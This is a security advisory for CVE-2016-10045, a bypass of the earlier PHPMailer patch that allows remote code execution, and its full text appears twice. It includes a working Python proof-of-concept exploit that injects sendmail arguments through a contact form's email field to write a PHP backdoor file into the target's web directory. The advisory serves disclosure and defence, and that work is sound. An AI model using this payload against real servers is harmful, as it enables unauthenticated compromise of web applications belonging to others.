__ __ __ __ __
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/
<-- BACK TO legalhackers.com
Follow @dawid_golunski ============================================= - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhackers.com - CVE-2016-10045 - Release date: 27.12.2016 - Revision 1.0 - Severity: Critical ============================================= I. VULNERABILITY ------------------------- phpMailer < 5.2.20 Remote Code Execution (0day Patch Bypass/exploit) II. BACKGROUND ------------------------- "PHPMailer continues to be the world's most popular transport class, with an estimated 9 million users worldwide. Downloads continue at a significant pace daily." http://phpmailer.worxware.com/ "Probably the world's most popular code for sending email from PHP! Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and many more" https://github.com/PHPMailer/PHPMailer III. INTRODUCTION ------------------------- An independent research uncovered a critical vulnerability in PHPMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class. The first patch of the vulnerability CVE-2016-10033 was incomplete. This advisory demonstrates the bypass of the patch. IV. DESCRIPTION ------------------------- The patch for CVE-2016-10033 vulnerability does not take into account the clashing of the escapeshellarg() function with internal escaping (escapeshellcmd() function) of mail(). As a result it is possible to inject an extra quote that does not get properly escaped as demonstrated by the PoC below. V. PROOF OF CONCEPT EXPLOIT ------------------------- #!/usr/bin/python #PHPMailer_RCE_exploit.pl intro = """ PHPMailer RCE PoC Exploits PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) + PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) (the bypass of the first patch for CVE-2016-10033) Discovered and Coded by: Dawid Golunski @dawid_golunski https://legalhackers.com """ usage = """ Usage: Full Advisory: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt PoC Video: https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html Disclaimer: For testing purposes only. Do no harm. """ import time import urllib import urllib2 import socket import sys RW_DIR = "/var/www/html/uploads" url = ' http://VictimWebServer/contact_form.php' # Set destination URL here # Choose/uncomment one of the payloads: # PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) #payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR # Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR ###################################### # PHP code to be saved into the backdoor php file on the target in RW_DIR RCE_PHP_CODE = "<?php phpinfo(); ?>" post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE} # Attack data = urllib.urlencode(post_fields) req = urllib2.Request(url, data) response = urllib2.urlopen(req) the_page = response.read() ~~~~~~~~~~~ The researcher also developed an Unauthenticated RCE exploit for a popular open-source application (deployed on the Internet on more than a million servers) as a PoC for real-world exploitation. It might be published after the vendor has fixed the vulnerabilities. Video PoC: ~~~~~~~~~~~~~ https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html VI. BUSINESS IMPACT ------------------------- A successful exploitation could let remote attackers to gain access to the target server in the context of the web server account which could lead to a full compromise of the web application. VII. SYSTEMS AFFECTED ------------------------- All current versions of (PHPMailer <5.2.20) are affected. Note that exploitation is not limited to systems with Sendmail MTA. VIII. SOLUTION ------------------------- The vulnerability / patch bypass was responsibly reported to the vendor on December 26th and a new CVE was issued by MITRE on the same day. The vendor has been working on a new patch which should be published shortly. IX. REFERENCES ------------------------- https://legalhackers.com This advisory (CVE-2016-10045):The original vuln of CVE-2016-10033:Video PoC:Exploit code: Simple PoC shown above is available here:Other exploits with other attack vectors will be disclosed at a later date to allow more time for patching. CVE-2016-10045PHPMailer / Vendor security updates / notices:X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) comXI. REVISION HISTORY ------------------------- 27.12.2016 - Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
Follow @dawid_golunski ============================================= - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhackers.com - CVE-2016-10045 - Release date: 27.12.2016 - Revision 1.0 - Severity: Critical ============================================= I. VULNERABILITY ------------------------- phpMailer < 5.2.20 Remote Code Execution (0day Patch Bypass/exploit) II. BACKGROUND ------------------------- "PHPMailer continues to be the world's most popular transport class, with an estimated 9 million users worldwide. Downloads continue at a significant pace daily." http://phpmailer.worxware.com/ "Probably the world's most popular code for sending email from PHP! Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and many more" https://github.com/PHPMailer/PHPMailer III. INTRODUCTION ------------------------- An independent research uncovered a critical vulnerability in PHPMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class. The first patch of the vulnerability CVE-2016-10033 was incomplete. This advisory demonstrates the bypass of the patch. IV. DESCRIPTION ------------------------- The patch for CVE-2016-10033 vulnerability does not take into account the clashing of the escapeshellarg() function with internal escaping (escapeshellcmd() function) of mail(). As a result it is possible to inject an extra quote that does not get properly escaped as demonstrated by the PoC below. V. PROOF OF CONCEPT EXPLOIT ------------------------- #!/usr/bin/python #PHPMailer_RCE_exploit.pl intro = """ PHPMailer RCE PoC Exploits PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) + PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) (the bypass of the first patch for CVE-2016-10033) Discovered and Coded by: Dawid Golunski @dawid_golunski https://legalhackers.com """ usage = """ Usage: Full Advisory: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt PoC Video: https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html Disclaimer: For testing purposes only. Do no harm. """ import time import urllib import urllib2 import socket import sys RW_DIR = "/var/www/html/uploads" url = ' http://VictimWebServer/contact_form.php' # Set destination URL here # Choose/uncomment one of the payloads: # PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) #payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR # Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR ###################################### # PHP code to be saved into the backdoor php file on the target in RW_DIR RCE_PHP_CODE = "<?php phpinfo(); ?>" post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE} # Attack data = urllib.urlencode(post_fields) req = urllib2.Request(url, data) response = urllib2.urlopen(req) the_page = response.read() ~~~~~~~~~~~ The researcher also developed an Unauthenticated RCE exploit for a popular open-source application (deployed on the Internet on more than a million servers) as a PoC for real-world exploitation. It might be published after the vendor has fixed the vulnerabilities. Video PoC: ~~~~~~~~~~~~~ https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html VI. BUSINESS IMPACT ------------------------- A successful exploitation could let remote attackers to gain access to the target server in the context of the web server account which could lead to a full compromise of the web application. VII. SYSTEMS AFFECTED ------------------------- All current versions of (PHPMailer <5.2.20) are affected. Note that exploitation is not limited to systems with Sendmail MTA. VIII. SOLUTION ------------------------- The vulnerability / patch bypass was responsibly reported to the vendor on December 26th and a new CVE was issued by MITRE on the same day. The vendor has been working on a new patch which should be published shortly. IX. REFERENCES ------------------------- https://legalhackers.com This advisory (CVE-2016-10045):The original vuln of CVE-2016-10033:Video PoC:Exploit code: Simple PoC shown above is available here:Other exploits with other attack vectors will be disclosed at a later date to allow more time for patching. CVE-2016-10045PHPMailer / Vendor security updates / notices:X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) comXI. REVISION HISTORY ------------------------- 27.12.2016 - Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.